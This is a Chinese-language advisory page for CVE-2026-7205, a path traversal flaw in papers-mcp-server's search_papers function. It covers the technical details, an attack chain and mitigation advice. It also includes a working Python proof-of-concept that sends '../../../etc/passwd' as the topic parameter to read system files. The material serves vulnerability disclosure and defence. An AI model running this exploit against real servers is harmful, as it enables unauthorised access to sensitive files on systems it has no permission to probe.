CVE-2026-7205: papers-mcp-server路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7205

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

duartium papers-mcp-server

漏洞概述

duartium papers-mcp-server版本9ceb381中存在严重安全漏洞。该漏洞源于文件src/main.py中的search_papers函数未正确过滤用户输入的topic参数。攻击者无需身份认证即可远程利用该漏洞实施路径遍历攻击，导致系统机密性、完整性和可用性受到低程度影响。目前漏洞利用代码已公开，且厂商尚未修复。

技术细节

该漏洞位于duartium papers-mcp-server项目的src/main.py文件中的search_papers函数。该函数主要用于处理用户提交的topic参数以搜索学术论文，但由于代码逻辑缺陷，未对该参数进行严格的路径规范化或安全校验，直接将其用于文件系统操作。攻击者可以通过构造包含特殊字符（如“../”或绝对路径）的恶意topic参数，绕过预期的目录限制，从而访问服务器上的任意文件。根据CVSS向量（AV:N/AC:L/PR:N/UI:N），该漏洞具有网络攻击面、低攻击复杂度，且无需任何身份认证即可远程触发。尽管CVSS评分对CIA三要素的影响均为低，但结合已公开的PoC代码，攻击者可轻易读取敏感配置文件，为后续攻击提供便利。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在运行受影响的duartium papers-mcp-server版本（commit 9ceb381）。

STEP 2

2. 漏洞探测

攻击者向search_papers接口发送带有特殊字符（如../）的topic参数，测试是否存在路径遍历异常。

STEP 3

3. 漏洞利用

攻击者构造恶意Payload（例如topic=../../../etc/passwd），发送至服务器，绕过目录限制读取敏感文件。

STEP 4

4. 后果达成

服务器返回目标文件内容，攻击者获取系统敏感信息，可能为进一步提权或攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7205: Path Traversal in papers-mcp-server
# This script demonstrates how to exploit the vulnerable 'topic' parameter.

import requests
import sys

def exploit(target_url):
    # The vulnerable endpoint is assumed to be '/search_papers' based on the function name
    # Adjust the endpoint if the actual route differs.
    endpoint = f"{target_url}/search_papers"
    
    # Payload attempting to read /etc/passwd using path traversal sequences
    # The parameter 'topic' is the vulnerable injection point
    payload = {
        "topic": "../../../etc/passwd"
    }

    try:
        print(f"[*] Sending request to: {endpoint}")
        response = requests.get(endpoint, params=payload, timeout=10)

        if response.status_code == 200:
            print("[+] Request successful. Check response content for file contents:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://localhost:8000")
        sys.exit(1)
    
    exploit(sys.argv[1])

影响范围

duartium papers-mcp-server 9ceb3812a6458ba7922ca24a7406f8807bc55598

防御指南

临时缓解措施

建议在应用网关或WAF层部署规则，拦截包含路径遍历特征（如../）的请求参数。若无需对外提供该服务，请暂时关闭search_papers相关接口的网络访问，直至获得官方修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7205
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7205
3 Details https://www.cvedetails.com/cve/CVE-2026-7205/
4 VulDB https://vuldb.com/cve/CVE-2026-7205
5 Link https://github.com/duartium/papers-mcp-server/
6 Link https://github.com/duartium/papers-mcp-server/issues/1
7 Link https://vuldb.com/submit/802080
8 Link https://vuldb.com/vuln/359805
9 Link https://vuldb.com/vuln/359805/cti